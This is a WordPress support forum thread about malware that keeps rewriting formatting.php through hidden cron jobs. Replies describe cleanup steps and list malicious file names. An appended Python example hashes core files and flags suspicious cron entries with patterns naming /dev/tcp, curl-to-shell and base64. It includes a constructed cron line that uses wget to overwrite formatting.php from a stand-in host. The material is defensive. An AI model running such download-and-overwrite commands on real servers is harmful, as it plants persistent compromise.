• Kaye

    (@wahmaholic)


    I am out of ideas on where to find the backdoor that allows the malware to change the wp-includes/formatting.php file on this site. This is the screenshot of the offending line (from a Sucuri scan):

    https://imgur.com/a/RfmL6iR

    This seems to be creating new customer accounts on the website. When I found out about it, it had already created more than one thousand new customer accounts. I already reset all administrator passwords, reset my FTP password, reset my hosting account password, reset my cPanel password, put new salt and security keys on the wp-config file, looked in the usual places, made sure no PHP files are in the uploads folder, uploaded fresh copies of the plugins and themes (all of them are reputable plugins), uploaded fresh WordPress files. I even tried reinstalling the entire WordPress website, but I was faced with the same problem.

    Can anyone help me figure it out?


Viewing 4 replies - 1 through 4 (of 4 total)
  • Sorry to hear that. Did you try any security plugin to scan and delete the potential malware? If not, then you could try iThemes Security or Wordfence plugin.

    Give it a try, and let me know how that goes!

    Thread Starter Kaye

    (@wahmaholic)

    I did try with WordFence and then with Sucuri. They detect the file as being modified, but even if I restore it to the original formatting.php, it still comes out as being infected a few seconds after.

    I have already traced the persistence to being a couple of cron jobs that I cannot seem to delete from my cPanel. I am in contact with my hosting account right now to ask for help, and I am on hold because they cannot seem to figure out how to delete the cron jobs as well.

    Here are my current cron jobs; I want help with deleting the last two because those look suspicious to me.

    https://imgur.com/a/u7LQL4a


    I’ve been infected with this same thing. I'm not sure if you ever got help, but bits and pieces of posts from different sites helped me get it under control. My site was being redirected and also contained blog posts that went to poker sites with iframes.

    1. Had my host run a scan on my server and removed the files it found. Look for anything similar on your site in the same areas that just doesn't look like core files. (Alternatively you could go to step 2 if you can.)

      /public_html/a4496f.php
      /public_html/wp-admin/link-parse-opml-core.php
      /public_html/hazmod.php
      /public_html/wp-includes/class.wp-dependencies-private.php

    2. Once I deleted those files I was able to install Wordfence and run a scan. It found more infected files. I updated the WordPress files except the wp-content folder, updated the plugins, removed unused themes, removed any weird WordPress users and deleted all the blog posts it created. I even changed all account passwords (web host/cPanel/email account/WordPress admins/FTP accounts).
    3. I still had the issue of one file reverting back with a string of code in my wp-includes/plugin.php: as soon as I removed the bit of code, it was back after reopening the file. Your post led me to check my cron jobs, and from there I saw the malicious code like yours. I was able to erase it, and since then my plugin.php file has not updated with the string of code and my scans are clean, so fingers crossed. It might be possible you have to delete some infected files before you can remove the cron job trying to run.


      I truly hope that if anyone finds themselves here this helps, because I couldn't even find anything mentioning this exact backdoor but this post, and if you need help my username is the same on social media platforms so you can reach out.


    Had the same problem and this was the solution. Used Wordfence to repair and delete infected files. The wp-includes/formatting.php was constantly modified to permit the execution of PHP that was not meant to be executed. After deleting the cron job, the file in question stopped changing.
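The two checks the replies above converge on, comparing core files against known-good hashes and auditing the crontab for entries that fetch or overwrite code, as an added example that is not part of any post in this thread. The suspicious-pattern list, the sample tree and the sample crontab are constructed; in practice the baseline hashes would come from a clean copy of the same WordPress version.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed heuristics: things a legitimate WordPress cron entry should never do,
# such as fetching remote code, decoding payloads, or writing into wp-includes.
SUSPICIOUS_CRON = re.compile(
    r"base64|eval\(|wp-includes|/dev/tcp|curl\s.*\|\s*(ba)?sh|wget\s.*-O\s", re.I)

def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large core files need not be read into memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_modified(root: Path, known_good: dict) -> list:
    """Return relative paths whose hash differs from the known-good map, or that are missing."""
    return sorted(rel for rel, expected in known_good.items()
                  if not (root / rel).is_file() or sha256_of(root / rel) != expected)

def flag_cron_lines(crontab_text: str) -> list:
    """Return non-comment crontab lines that match the suspicious patterns."""
    return [line.strip() for line in crontab_text.splitlines()
            if line.strip() and not line.strip().startswith("#")
            and SUSPICIOUS_CRON.search(line)]

def demo() -> tuple:
    """Constructed scenario: record a clean hash, tamper with the file, then audit a crontab."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-includes").mkdir()
    fmt = root / "wp-includes" / "formatting.php"
    fmt.write_text("<?php\n// constructed stand-in for a clean formatting.php\n")
    known_good = {"wp-includes/formatting.php": sha256_of(fmt)}  # baseline from the clean copy
    fmt.write_text("<?php\n// constructed stand-in\n// line appended by the re-infection\n")
    crontab = (  # constructed crontab; the wget line stands in for the persistence job
        "# m h dom mon dow command\n"
        "0 3 * * * /usr/bin/php /home/site/public_html/wp-cron.php\n"
        "*/5 * * * * wget -q -O /home/site/public_html/wp-includes/formatting.php http://example.invalid/f\n"
    )
    return find_modified(root, known_good), flag_cron_lines(crontab)

if __name__ == "__main__":
    modified, flagged = demo()
    print("modified core files:", modified)
    print("suspicious cron entries:", flagged)
```

A file that keeps failing the hash check after being restored, paired with a flagged cron entry, is the pattern the thread describes; the cron entry is what to remove first, then the file.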

  • The topic ‘Malware keeps changing wp-includes/formatting.php file’ is closed to new replies.